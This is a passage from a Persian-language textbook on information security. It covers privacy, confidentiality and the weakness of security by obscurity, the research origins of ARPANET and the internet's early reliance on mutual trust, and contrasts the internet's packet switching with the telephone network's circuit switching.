ﺑﺘﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺧﻨﺜﻲ ،ﻳﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ
ﺭﻓﻊ ﻧﻤﻮﺩ.
ﻋﻨﺎﻭﻳﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ٣٣ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ٣٤ﺑﺎ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ .ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ "ﺧﺼﻮﺻﻲ" ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧـﺪ ﺗﻨﻬـﺎ
ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺧﺼﻮﺻﻲ ﺑﻤﺎﻧﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺫﺧﻴﺮﻩ
ﺷﺪﻩ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﺭﻓﺘـﺎﺭ
ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﮔﻮﻳﻲ ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺭﻧـﺪ .ﺍﻳـﻦ
ﺳﻴﺎﺳﺖ ﺭﺍ ﺍﻣﻨﻴـﺖ ﮔﻤﻨـﺎﻣﻲ ٣٥ﻣـﻲ ﻧﺎﻣﻨـﺪ .ﺑـﻪ ﻫﻤـﻴﻦ ﺗﺮﺗﻴـﺐ
ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔـﺬﺍﺭﺩﻩ ﺷـﻮﻧﺪ
ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ
ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ .ﺍﮔﺮ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻫﻤﻴﺸﻪ ﺩﺭ ﻳﻚ ﻣﻜﺎﻥ ﻧﻴﺴﺘﻨﺪ ﻫﻨﮕﺎﻡ
ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ
ﺍﻋﻤﺎﻝ ﺷﻮﺩ.
ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﻧﻈﻴﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ،
ﻭﻟﻲ ﺑﺎ ﻓﺮﺽ ﻃﺒﻴﻌـﺖ ﺧـﺎﺹ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ ﺍﺭﺗﺒـﺎﻁ ﻣﻴـﺎﻥ
ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺩﺭ ﺁﻥ ،ﺍﻣﻨﻴــﺖ ﮔﻤﻨــﺎﻣﻲ ﻳــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﭘﻨﻬﺎﻥﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻲ ﺿﻌﻴﻒ ﻣـﻲﻧﻤﺎﻳـﺪ ﻭ ﺑﺎﻳـﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨـﺎﺏ
Privacy
Confidentiality
Security By Obscurity
33
34
35
ﻛﺮﺩ .ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﻘﻴﺎﺳﻬﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ.
ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ
ﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣـﺮﻭﺯ ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑـﺎ ﻫـﺪﻑ
ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍ ﹺ
ﭘﮋﻭﻫﺶ ﻭ ﺁﻣﻮﺯﺵ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﺑـﻮﺩ .ﺯﻣﺎﻧﻴﻜـﻪ ARPANET
)ﺍﻳﻨﺘﺮﻧﺖ ﺍﻭﻟﻴﻪ( ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺍﻳﺠﺎﺩ ﺷﺪ ،ﻫﺪﻑ ﺍﺻﻠﻲ ﺁﻥ ﺍﺷﺘﺮﺍﻙ
ﻣﻨﺎﺑﻊ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺘﻌﺪﺩ ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ
ﻣﺨﺘﻠﻒ ﺑﻮﺩ .ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻫﺪﺍﻑ ﻳﻜـﺴﺎﻥ ﺩﺍﺷـﺘﻨﺪ ﻭ ﺑـﺎ ﻫـﺪﻑ
ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺷﺘﻦ ﻣﻨﺎﺑﻊ ﻭ ﺩﺍﺩﻩﻫﺎ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﺷﺒﻜﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﻋﻀﺎﻱ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻣﻲﺷﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺁﻥ ﺯﻣﺎﻥ
ﻧﮕﺮﺍﻧﻲ ﭼﻨﺪﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﻧﺪﺍﺷـﺖ.
ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪ ﺟﻬﺎﻧﻲ ﻭﺏ ﻧﻴﺰ ﺑﺮ ﻫﻤﻴﻦ ﺍﺳﺎﺱ ﺷﻜﻞ ﮔﺮﻓﺖ ﺗـﺎ
ﻳﻚ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺷﺪ؛ ﺑﺪﻭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺮﺍﻱ ﻛﺴﺐ
ﻣﺠﻮﺯ ﻳﺎ ﺗﺴﻬﻴﻞ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻣﺎﻟﻲ.
ﻓﺮﻫﻨﮓ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ ﻭ
ﺩﺍﻧﺸﮕﺎﻫﻴﺎﻥ ﻃﻲ ﺩﻫﺔ ۹۰ﺗﻮﺳﻂ ARPANETﻣﻄﺮﺡ ﺷـﺪ ﻭ
ﻫﻨﻮﺯ ﻫﻢ ﻧﺸﺎﻧﻪﻫـﺎﻳﻲ ﺍﺯ ﺁﻥ ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ .ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ
ﻓﺮﻫﻨﮓ ،ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﺗـﺎ ﺣـﺪ ﻣﻤﻜـﻦ ﺩﺭ
ﺩﺳﺘﺮﺱ ﻭ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻭ ﺍﻣﻜﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﺻـﺪﻫﺎ
ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﻣﺮﺩﻡ ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺟﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻭ ﭘﺎﺳﺨﻲ ﺑﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﭼـﺮﺍ
ﺍﻳﻨﺘﺮﻧﺖ ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ ﺭﺷـﺪ ﺭﺳـﻴﺪﻩ ﺍﺳـﺖ .ﺟﻨﺒـﺔ
ﺍﺧﻼﻗــﻲ ﺍﻳــﻦ ﻓﺮﻫﻨــﮓ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ ﻋﺎﻣﻴﺎﻧــﺔ ﻣﺮﺩﻣــﻲ ﻛــﻪ
ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﻨﺒﻌـﻲ ﺑـﺴﻴﺎﺭ ﺧـﻮﺏ ﻭ ﻣﻌﺘﺒـﺮ ﺗﻮﺻـﻴﻒ ﻣـﻲﻛﻨﻨـﺪ
ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﻗﺪﺭﺕ ﺭﺳﺎﻧﻪﺍﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﺛﺮﺍﺕ ﻛـﺎﺭ
ﺑﺎ ﺁﻧﺮﺍ ﺩﻳﺪﻩﺍﻧﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﻣﺎﻫﻴـﺖ ﺍﻳﻨﺘﺮﻧـﺖ ﮔﻔﺘـﻪ
ﻣﻲﺷﻮﺩ ﻛﻪ "ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺗﻤﺎﻳﻞ ﺑﻪ ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺩﺍﺭﻧﺪ".
ﻳﻚ ﺗﻮﺟﻴﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻥ
ﺍﺳﺖ ﻛﻪ ﻧﺴﻞ ﺍﻭﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﻤﺎﺩ ﻣﺘﻘﺎﺑﻞ ﺍﻳﺠﺎﺩ ﺷﺪﻩ
ﺑﻮﺩ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺷﻜﺎﺭﺍ ﺑﺮﺍﻱ ﻛـﺎﺭ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ ﻫـﻢ ﺍﻋﺘﻤـﺎﺩ
ﻣﻲﻛﺮﺩﻧﺪ .ﺑﺎ ﮔﺴﺘﺮﺵ ﻭﺳﻴﻊ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑـﻪ ﻋـﻀﻮﻳﺖ ﺩﺭﺁﻣـﺪﻥ
ﺍﻓﺮﺍﺩ ﺑﻴﺸﺘﺮ ﺑﺎ ﻋﻼﻳﻖ ﻭ ﺍﻫﺪﺍﻑ ﻣﺨﺘﻠﻒ ﺩﺭ ﺁﻥ ،ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ
ﻣﻌﻨﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻳﻜـﻲ ﺍﺯ ﻣﺒﺎﺣـﺚ
ﻋﻤﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻌﺔ ﻣﻔﻬـﻮﻡ ﻧـﻮﻳﻦ ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ ﺍﺳـﺖ
٣٥
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻗﺒـﻞ ﺍﺯ ﺧـﻮﺩ ﭼﻨـﺪﻳﻦ ﺗﻔـﺎﻭﺕ
ﺍﺳﺎﺳﻲ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺑﻌـﻀﻲ
ﺍﺯ ﺍﻳﻦ ﺗﻔﺎﻭﺗﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑـﺎ ﺷـﺒﻜﺔ ﺗﻠﻔـﻦ ﻋﻤـﻮﻣﻲ
ﺳﻮﺋﻴﭻ ﺷﺪﻩ ) ٣٦(PSTNﻛـﻪ ﺭﻭﺯﺍﻧـﻪ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﺷﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﻢ ﺑﻬﺘﺮ ﺩﺭﻙ ﻣﻲﺷﻮﻧﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﺳﺎﺱ ﻣﺪﻟﻲ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﺭ ﻣـﻲ ﻛﻨـﺪ ﻛـﻪ
Packet Switchingﻧﺎﻡ ﺩﺍﺭﺩ .ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ
ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻋﺒﻮﺭ ﻣﻲ ﻛﻨﺪ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﺑـﺴﺘﺔ ﺩﺍﺩﻩ ﺷﻜـﺴﺘﻪ
ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺷـﺪﻩ ﻭ ﻫـﺮ ﻛـﺪﺍﻡ ﺑـﺼﻮﺭﺕ
ﻣﺴﺘﻘﻞ ﺩﺭ ﺷﺒﻜﻪ ﺍﺭﺳﺎﻝ ﻭ ﭘﺲ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﺩﺭ ﻣﻘـﺼﺪ ﻣﺠـﺪﺩﹰﺍ
ﺳﺮﻫﻢﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ )ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ( .ﺍﻳـﻦ
ﺭﻭﺵ ﺍﻧﺘﻘـﺎﻝ ﺩﺭ ﻧﻘﻄـﺔ ﻣﻘﺎﺑـﻞ - Circuit Switchingﻛـﻪ
PSTNﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ -ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺑـﻪ
ﻫﺮ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻳﻚ ﻣﺪﺍﺭ ﻭﺍﺣﺪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﻟـﺬﺍ
ﺩﺭ ﺁﻥ ﺣﺠﻢ ﺻﺪﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻳﺎﻓﺘﻪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﻣﻬﻢ ﻧﻴﺴﺖ.
ﺍﻳﻨﺘﺮﻧﺖ ﺭﺳﺎﻧﻪﺍﻱ ﻧﺎﺩﺍﻥ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻛـﻪ ﻣـﻲﺩﺍﻧـﺪ
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺍﺯ ﻳﻚ ﻣﺒﺪﺃ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﻪ
٣٧
ﻳﻚ ﻣﻘﺼﺪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺮﺳﺎﻧﺪ .ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ
ﺩﺭ ﺍﻧﺘﻬﺎ ﻭ ﺩﺭ ﻟﺒﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ
ﻫﺴﺘﻨﺪ .ﺩﺭ ﻋﻮﺽ ﺩﺭ PSTNﺍﺳﺎﺱ ﻛﺎﺭ ﺷـﺒﻜﻪ "ﻫﻮﺷـﻤﻨﺪﻱ"
ﺍﺳﺖ ﻭ ﺍﺑـﺰﺍﺭ ﻛـﺎﺭﺑﺮ ﺩﺭ ﻧﻘـﺎﻁ ﺍﻧﺘﻬـﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩ ﺍﻧـﺪﻛﻲ ﺑـﺮﺍﻱ
ﺻﺤﺒﺖﻛﺮﺩﻥ ﻳﺎ ﮔﻮﺵﺩﺍﺩﻥ ﺩﺍﺭﻧﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﺍﺳﺖ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ
ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺮﺯﻫـﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ
ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻭﻳﮋﮔـﻲ ﺑـﺎﺭﺯﺗﺮﻳﻦ ﻭ
ﺟﺎﻟﺒﺘﺮﻳﻦ ﺧﺼﻮﺻﻴﺖ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﺍﺭﺗﺒـﺎﻁ ﭼﻨـﺪﺍﻧﻲ ﺑـﻪ
ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ .ﺷﺒﻜﺔ PSTNﻧﻴﺰ ﺟﻬﺎﻧﻲ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺭﻭﺷـﻬﺎﻱ
ﺩﺳﺘﺮﺳﻲ ﺗﻠﻔﻨﻲ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺍﻳﻨﺘﺮﻧـﺖ
ﻼ ﻛﺎﺭﺑﺮ ﺗﻠﻔﻦ ﻣﻲﺩﺍﻧﺪ ﻛﻪ ﺑـﺎ ﻳـﻚ ﻛـﺸﻮﺭ ﺧـﺎﺭﺟﻲ
ﻧﻴﺴﺖ ﻭ ﻣﺜ ﹰ
ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺍﺳﺖ؛ ﺍﻣﺎ ﻭﻗﺘﻴﻜﻪ ﺑﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺳﺘﺮﺳـﻲ
ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻟﺰﻭﻣـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺪﺍﻧـﺪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺁﻥ ﺩﺭ
ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻗﺮﺍﺭ ﺩﺍﺭﺩ.
Public Switched Telephone Network
Internet Services
36
37
ﺍﻳﻨﺘﺮﻧــﺖ ﻏﻴﺮﻣﺘﻤﺮﻛــﺰ ﺍﺳــﺖ ﻭ ﺩﺭ ﺁﻥ ﻫــﻴﭻ ﺳﻴــﺴﺘﻢ ﻣﺮﻛــﺰﻱ
ﺍﺭﺗﺒﺎﻃﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﻫﻤﻴﻨﻜﻪ ﺷـﻤﺎ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺍﺻـﻠﻲ ﺁﻥ
ﻧﻈﻴﺮ TCP/IPﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷـﺒﻜﻪ ﺧـﻮﺩ ﺭﺍ
ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻤﺎﻳﻴﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻫﻤﻪﺟـﺎ ﺭﺍﻳـﺞ ﺍﺳـﺖ ﻭ ﻣﻮﺍﻧـﻊ ﻭﺭﻭﺩ ﺑـﻪ ﺁﻥ ﺍﻧـﺪﻙ
٤٠
ﻫﺴﺘﻨﺪ .ﻣﻘﺪﺍﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ )ﺳﺮﻋﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑـﺎ ﺁﻥ
ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴـﺪ( ﻧﻴﺰ ﺑﻪ ﻇﺮﻓﻴﺖ ﺣﻤـﻞ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ ،ﺍﺗـﺼﺎﻻﺕ
ﻓﻴﺒﺮﻱ ﻳﺎ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﻭﺍﻗﻊ ﺩﺭ ﻣـﺴﻴﺮ ﺍﻧﺘﻘـﺎﻝ ﺑـﺴﺘﮕﻲ
ﺩﺍﺭﺩ .ﺩﺭ ﺷﺎﻫﺮﺍﻩ ﺁﻥ ﻃﻴﻔﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛﻤﻴـﺎﺏ ﻭﺟـﻮﺩ
ﻧﺪﺍﺭﻧﺪ .ﻫﺮﺟﺎ ﻛـﻪ ﺍﺯ ﻃﻴـﻒ ﺭﺍﺩﻳـﻮﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﮔـﺮﺩﺩ -ﻣﺎﻧﻨـﺪ
ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ
ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ) ٤١(WLANsﻛﻪ ﻣﻌﻤـﻮ ﹰ
Wi-Fiﺍﺯ ﺁﻧﻬﺎ ﻧﺎﻡ ﺑﺮﺩﻩ ﻣﻲﺷﻮﺩ -ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺮﺗﺒﻂ
ﻳﻚ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻛﻲ ﺭﺍ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ ﻛـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺳـﺎﺩﻩ
ﻣﻲﻛﻨﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻮﺳﻂ ﻭﺍﻗﻊ ﺩﺭ ﺑﺨـﺸﻬﺎﻳﻲ ﺍﺯ ﺩﻧﻴـﺎ ﻛـﻪ
ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺤﻠﻲ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻧـﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺗﻤـﺎﻡ
ﻣﻲﺷﻮﺩ .ﻗﻴﻤﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔـﻦ ﻭ
ﻛﺎﻓﻲﻧﺖ ﻭ ﺩﻳﮕﺮ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑﺴﻴﺎﺭ
ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺩﺭﺻـﺪ
ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺮﺩﻡ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﻣﻲﺑﺎﺷﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻧﻊ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﻣﺆﻟﻒ ﻭ ﻧﺎﺷﺮ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻩ ﺍﺳـﺖ؛
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺎﺷـﺮ ﺑﺎﺷـﻴﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺧـﺪﻣﺎﺕ
ﺷﺒﻜﻪﺍﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﻛﺎﻓﻴـﺴﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ
